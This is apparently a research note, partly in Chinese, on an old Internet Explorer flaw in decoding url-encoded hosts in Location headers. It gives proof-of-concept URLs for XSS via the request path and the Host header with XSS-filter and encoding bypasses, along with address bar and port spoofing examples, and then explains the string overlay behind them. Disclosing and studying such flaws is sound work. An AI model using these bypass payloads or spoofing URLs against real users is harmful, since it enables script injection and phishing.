参考:
http://blog.bentkowski.info/2015/04/xss-via-host-header-cse.html
https://web.archive.org/web/20131107024350/http://blackfan.ru/
Source
RequestURI: <%= request.getRequestURI() %>
Host: <%= request.getServerName() %>
Port: <%= request.getLocalPort() %>
PoC (all versions IE 5.5 - 10.0 are affected):
XSS via Request-Path + XSS filter bypass + URLencode bypass + Address Bar Spoofing
http://blackfan.ru:8080/x?r=http://blackfan.ru/<img/src='x'onerror=alert(1)>/%252e%252e/%252e%252e/
XSS via Host header + XSS filter bypass
http://blackfan.ru:8080/x?r=http://blackfan.ru%252F<img%252Fsrc='x'onerror=alert(1)>%252F.%252e%252F.%252e%252F%253F%2523
Port Spoofing
http://blackfan.ru:8080/x?r=http://www.microsoft.com%253A11/ru-ru/default.aspx
http://blackfan.ru:8080/x?r=http://www.oracle.com%253A31337%252Findex.html%253F
Description
Incorrect handling of url-encoded host in Location-header
Example
Location-header:
http://%77%77%77%2E%6D%69%63%72%6F%73%6F%66%74%2E%63%6F%6D/test
Original Host
%77%77%77%2E%6D%69%63%72%6F%73%6F%66%74%2E%63%6F%6D
Decoding
www.microsoft.com
Overlaying with the original
www.microsoft.com
+
%77%77%77%2E%6D%69%63%72%6F%73%6F%66%74%2E%63%6F%6D
=
www.microsoft.com9%63%72%6F%73%6F%66%74%2E%63%6F%6D
注:www.microsoft.com
和%77%77%77%2E%6D%6
的长度是一样的。关于具体的叠加方法,参考这张图:
it appears that IE does some odd overlaying of the path in its URL-encoded and URL-decoded form.
➜ ~/GitProjects python -c "print len('%77%77%77%2E%6D%6');print len('www.microsoft.com')"
17
17
Result
http://www.microsoft.com9crosoft.com/test
XSS via Host Example
Location: http://example.com%2F<xss>%2F%2E%2E%2F%3F%23
Decoding:
example.com/<xss>/../?#
Overlaying:
example.com/<xss>/../?#2E%2E%2F%3F%23
Result Request:
GET /<xss>/../?#2E%2E%2F%3F%23 HTTP/1.1
Host: example.com/<xss>/../?#
Port Spoofing Example:
Location: http://example.com%3A80
Decoding:
example.com:80
Overlaying:
example.com:80
+
example.com%3A80
=
example.com:8080
Address Bar:
example.com:8080